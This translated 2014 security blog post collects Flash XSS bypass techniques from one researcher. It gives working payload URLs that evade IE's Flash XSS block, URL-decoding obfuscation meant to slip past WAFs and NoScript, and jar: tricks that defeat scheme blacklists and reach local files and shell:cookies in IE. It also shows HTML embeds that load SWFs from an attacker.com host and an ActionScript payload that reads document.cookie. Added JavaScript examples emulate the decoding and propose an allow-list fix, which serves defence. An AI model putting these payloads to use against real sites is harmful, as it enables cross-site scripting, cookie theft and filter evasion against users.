Mramydnei · 2014/02/19

0x00 Preface


Original links:

Soroush.secproject.com/blog/2013/1…

Soroush.secproject.com/blog/2013/1…

Soroush.secproject.com/blog/2014/0…

This blog may look familiar when you open it. Yes, this is the researcher who found the file upload bypass in FCKeditor 2.6.8 (ASP). He is an entertaining character who often drops damaging 0days in talks or articles before the vendor has even been notified, let alone shipped a fix. If you haven't followed him before, doing so in the years ahead may bring some unexpected rewards.

0x01 Bypassing Flash XSS Protection By Internet Explorer


After some quick testing, it seems that only IE blocks the following Flash XSS. If you open this link in IE10:

http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);

You should see the message "Access is denied" in the console (open it with F12). If you open the same link in Chrome, Firefox or Opera instead, the alert box pops up without any trouble, as you would expect.

Then I came up with a way around IE's restriction:

http://0me.me/demo/xss/xssproject.swf?js=location.href='javascript:x="<script>alert(document.domain)</script>"'

A javascript: URL whose expression evaluates to a string, such as javascript:x="echo", makes the browser replace the current page with that string. Because the string is rendered as HTML, putting tags such as <script> inside it, as in the example above, gets our script executed and bypasses IE's restriction.

0x02 Using Flash's URL decoding to bypass some protection mechanisms


This comes in handy when the vector has to reach a victim sitting behind a WAF or filtering proxy (FlashVars can also be passed after a # in the URL, so they never leave the browser) or when you want to get past client-side XSS filters. It all rests on the fact that Flash Player silently discards malformed URL-encoded sequences instead of rejecting them.

(1) If the character after a % is not a hexadecimal digit ([^0-9a-fA-F]), Flash discards both the % and that character (two characters in total), for example:

"%X" or "%="

(2) If the % is followed by one valid hexadecimal digit and then an invalid one, all three characters are discarded, for example:

"%AX" or "%A&"

Note: characters with a code above 127 are sometimes turned into question marks; this happens when the URL is actually used for navigation. Also, a URL-encoded BOM (%EF%BB%BF) can be used in place of a space, since JavaScript treats U+FEFF as whitespace. For example, "alert(1)" can be written as "alert%EF%BB%BF(1)".

Finally, putting it all together:

http://0me.me/demo/xss/xssproject.swf?%#js=al%A#e%Xrt(docum%A#ent.doma%A#in);

http://0me.me/demo/xss/xssproject.swf?%I%R%S%D%%Ljs=loca%Xtion.hr%Yef='jav%Zascri%AXpt:x="<sc%AYript>ale%AZrt(docu%?ment.dom%/ain)</sc%&ript>"'

Success! I also used this trick to bypass NoScript, but that was fixed in 2.6.6.8.
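To make the decoding rules above concrete, here is an added example (my own code, not from the original post or from Adobe) that emulates Flash Player's lenient URL decoding as inferred from the two vectors above, and runs a constructed raw-string blacklist over them to show why a filter that does not decode the way Flash does misses the payload. How a lone "%" or "%A" at the very end of the string is treated is an assumption; the page does not say.

```javascript
// Emulation of Flash Player's lenient URL decoding as described in 0x02.
// Added example, not code from the original post or from Adobe. Rules (inferred
// from the post's vectors):
//   %XX with two hex digits      -> the decoded byte
//   % followed by a non-hex char -> '%' and that char are dropped (2 chars)
//   % + hex digit + non-hex char -> all three chars are dropped
//   lone '%' or '%A' at the end  -> assumed to be dropped (not stated on the page)
const HEX = /^[0-9a-fA-F]$/;

function flashUrlDecode(s) {
  const chars = Array.from(s);            // iterate by code point, not UTF-16 unit
  const enc = new TextEncoder();
  const bytes = [];
  let i = 0;
  while (i < chars.length) {
    if (chars[i] !== '%') {
      bytes.push(...enc.encode(chars[i])); // ordinary character, copied through as UTF-8
      i += 1;
      continue;
    }
    const h1 = chars[i + 1], h2 = chars[i + 2];
    const h1ok = h1 !== undefined && HEX.test(h1);
    const h2ok = h2 !== undefined && HEX.test(h2);
    if (h1ok && h2ok) {
      bytes.push(parseInt(h1 + h2, 16));   // "%41": a normal escape
      i += 3;
    } else if (h1ok) {
      i += 3;                              // "%A#": percent, hex digit and junk all vanish
    } else {
      i += 2;                              // "%X", "%=": percent and the junk char vanish
    }
  }
  // ignoreBOM keeps U+FEFF in the output, which is what the alert%EF%BB%BF(1) trick relies on.
  return new TextDecoder('utf-8', { ignoreBOM: true }).decode(Uint8Array.from(bytes));
}

// A blacklist that inspects the raw query string, constructed here for illustration.
// It never sees "alert" or "<script" in the obfuscated vectors.
function naiveFilterBlocks(raw) {
  return /alert|<script|javascript:/i.test(raw);
}

// The two vectors from the post (the second one without the stray space).
const VECTOR1 = '%#js=al%A#e%Xrt(docum%A#ent.doma%A#in);';
const VECTOR2 = '%I%R%S%D%%Ljs=loca%Xtion.hr%Yef=\'jav%Zascri%AXpt:x="<sc%AYript>ale%AZrt(docu%?ment.dom%/ain)</sc%&ript>"\'';

for (const v of [VECTOR1, VECTOR2]) {
  console.log(`raw blocked: ${naiveFilterBlocks(v)}  decoded: ${flashUrlDecode(v)}`);
}
```

The lesson for a defender is the usual canonicalisation one: a filter in front of Flash content has to decode the parameter the same way the consumer does, or better, the SWF has to validate the decoded value itself.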

0x03 The true "warrior": the jar: protocol


Flash ignores the jar: protocol prefix and treats it as transparent: javascript:alert(1) and jar:javascript:alert(1) behave exactly the same in ActionScript. This means it can be used to get around blacklist checks that look for a dangerous scheme at the start of the string. Let's start with an example of a vulnerable check:

var input:String = root.loaderInfo.parameters.input; // input variable
var dangerousInput:RegExp = /^\w*script:.*/i; // meant to cover the javascript: and vbscript: protocols
if (!dangerousInput.test(input)) { // Safe to go? --> No! What about "jar:javascript:"?
    navigateToURL(new URLRequest(input), "_self"); // redirection
}

We can bypass this detection using the previously mentioned method:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=jar:javascript:alert(1); //

Another technique that I think is well known is the use of data URIs in Firefox.

0x04 Using navigateToURL to break local access restrictions


By default, Flash does not allow access (via navigateToURL) to sensitive protocols such as file:// or ms-its:. If you try to open the following link:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=file://c:\

You’ll get an error message like this:

SecurityError: Error #2148: SWF file http://0me.me/demo/xss/flash/link_protocol_test.swf?input=file://c:\ cannot access local resource file://c:\. Only local-with-filesystem and trusted local SWF files may access local resources.
    at global/flash.net::navigateToURL()
    at MethodInfo-1()
    at flash.events::EventDispatcher/dispatchEventFunction()
    at flash.events::EventDispatcher/dispatchEvent()
    at com.powerflasher.SampleApp::link_protocol_test()

I have tried the jar: protocol in Chrome, Firefox and Internet Explorer to get around this restriction, but without much success in the first two, so it only works in IE. Here are some bypass examples:

Access C drive using jar protocol:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=jar:file:/c:\

Open a file in drive C:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=jar:file:/c:\windows\Starter.xml

Enable some restricted protocols:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=jar:shell:cookies

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=jar:mk:@MSITStore:C:\Windows\Help\mui\0409\certmgr.CHM::/html/355962c2-4f6b-4cbd-ab00-6e7ee4dddc16.htm

Use some other tricks to access the C drive:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=\\/c:/
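An added example (my own code, not the original author's) that ports the vulnerable check from 0x03 to JavaScript and puts a hardened allow-list check beside it, then exercises both against the jar:javascript:, jar:file:, jar:shell: and \\/c:/ inputs from 0x03 and 0x04. The hardened version is a suggestion of how the SWF should validate its input; the allowed-scheme list and the relative-path rule are assumptions, not something the page prescribes.

```javascript
// The vulnerable check from 0x03, ported to JavaScript: a blacklist anchored on the two
// schemes it expects. "jar:javascript:" and the local-access tricks of 0x04 all slip past it.
function weakCheckAllows(input) {
  return !/^\w*script:.*/i.test(input);
}

// Hardened replacement (an assumption about how one would fix it, not the original
// author's code): allow-list the scheme instead of black-listing two of them, and
// accept relative URLs only if they start with a single "/" (not "//" or "\"), so they
// cannot be turned into scheme-relative, UNC or local references.
const ALLOWED_SCHEMES = new Set(['http', 'https']);

function strictAllows(input) {
  if (typeof input !== 'string') return false;
  // Browsers ignore leading ASCII control characters and whitespace before a scheme,
  // so strip them before looking at it, otherwise " javascript:" sneaks through.
  const url = input.replace(/^[\x00-\x20]+/, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (m) return ALLOWED_SCHEMES.has(m[1].toLowerCase());
  // Anything that fails to parse as a scheme must be a same-origin absolute path.
  return /^\/(?![\/\\])/.test(url);
}

// Inputs taken from the post plus a few benign ones, constructed for the demonstration.
const SAMPLES = [
  'javascript:alert(1)',
  'jar:javascript:alert(1); //',
  'jar:file:/c:\\',
  'jar:shell:cookies',
  '\\\\/c:/',
  ' javascript:alert(1)',
  'https://example.com/',
  '/relative/path',
  '//example.com/',
];

for (const s of SAMPLES) {
  console.log(`${JSON.stringify(s).padEnd(32)} weak: ${weakCheckAllows(s)}  strict: ${strictAllows(s)}`);
}
```

Note that the allow-list does not need to know about jar:, ms-its:, mk: or shell: at all; anything that is not http or https is refused, which is the property a blacklist can never give you.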

So once these limits are broken, what kind of risks will be brought to users?

1. Detecting sensitive local files (e.g. fingerprinting the type and version of the installed anti-virus software).
2. Collecting user information from local directories and files.
3. Hijacking sensitive local files via drag and drop (I can't give a good POC for this here).
4. Executing harmful local files (HTML, SWF, etc.) on behalf of the user, leading to data theft, remote code execution or other malicious outcomes.

Finally, a POC that pops open your CD-ROM drive (tested in IE10), just like some old virus. Give it a try:

0me.me/demo/xss/fl…

0x05 Bypassing the Flash sandbox


navigateToURL and getURL are the usual tools in Flash XSS, but the big precondition is that the embedding page has to grant script access via allowScriptAccess. I'll show how to get script running without it. Before that, let's look at what a normal allowScriptAccess setup looks like.

The first part is the ActionScript code inside the Flash file; here are AS3 and AS2 versions.

AS3:

navigateToURL(new URLRequest("javascript:alert(document.domain);"), "_self");

AS2:

getURL("javascript:alert(document.domain)", "_self");

Then our HTML page should look something like this:

<object width="320" height="240" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0">
  <param name="allowScriptAccess" value="always" />
  <param name="src" value="http://www.attacker.com/testme/flashtest/normalEmbededXSS.swf" />
  <embed width="320" height="240" type="application/x-shockwave-flash" src="http://www.attacker.com/testme/flashtest/normalEmbededXSS.swf" allowScriptAccess="always" />
</object>

Of course we can try to make it shorter:

<object width="320" height="240" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0">
  <param name="src" value="//www.attacker.com/testme/flashtest/normalEmbededXSS.swf" />
  <embed width="320" height="240" type="application/x-shockwave-flash" src="//www.attacker.com/testme/flashtest/normalEmbededXSS.swf" />
</object>

However, this version throws errors in IE (to see the detailed error messages, use the debugger version of Flash Player). The following form, with an embed tag and allowScriptAccess set, works:

<object width="320" height="240" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0">
  <param name="allowscriptaccess" value="always" />
  <param name="src" value="//0me.me/demo/xss/flash/normalEmbededXSS.swf" />
  <embed width="320" height="240" type="application/x-shockwave-flash" src="//0me.me/demo/xss/flash/normalEmbededXSS.swf" allowscriptaccess="always" />
</object>

With that background on how allowScriptAccess is normally used, let's look at the problems we run into without it.

1. The target of navigateToURL or getURL cannot be null/empty, "_self", "_parent" or "_top":

navigateToURL(new URLRequest("http://google.com/"), "_self");

2. We cannot use a javascript: URL for the navigation:

navigateToURL(new URLRequest("javascript:alert(document.domain);"), "testme");

The first problem is not that hard to solve: we can use tricks such as a named iframe, window.open, the target attribute of an <a> tag, or the target of a form. The second can be solved with the Flash behaviour mentioned earlier, where the jar: protocol prefix is ignored. Now let's put these together.

AS3 example:

navigateToURL(new URLRequest("jar:javascript:alert('domain: '+document.domain+'\\r\\nCookies: '+document.cookie);"), "testme");

AS2 example:

getURL("jar:javascript:alert('domain: '+document.domain+'\\r\\nCookies: '+document.cookie);", "testme");

Finally, let's finish it off. Suppose there is a page with an XSS vulnerability like this:

http://www.sdl.me/xssdemo/xss.asp?input=XSS_goes_here

If we don't use a named window, the following only works in Firefox:

http://www.sdl.me/xssdemo/xss.asp?input=<embed src=http://0me.me/demo/xss/flash/embededXSS.swf>

But with a named window it also works in the other browsers:

<iframe name="testme" src="http://www.sdl.me/xssdemo/xss.asp?input=<embed src=http://0me.me/demo/xss/flash/embededXSS.swf>" height="240" width="320"></iframe>

The embed tag here can also be replaced with an object tag. But Adobe has since released a patch that blocks the jar: protocol; I think it came out on the 17th of last month. So if you want to test this yourself, you may need to manually install a slightly older version of Flash. If you're a Kali Linux user who likes Firefox, this should be an easy way to bypass the Flash sandbox (I didn't go out of my way to update Firefox's Flash plugin, so it still works in my case).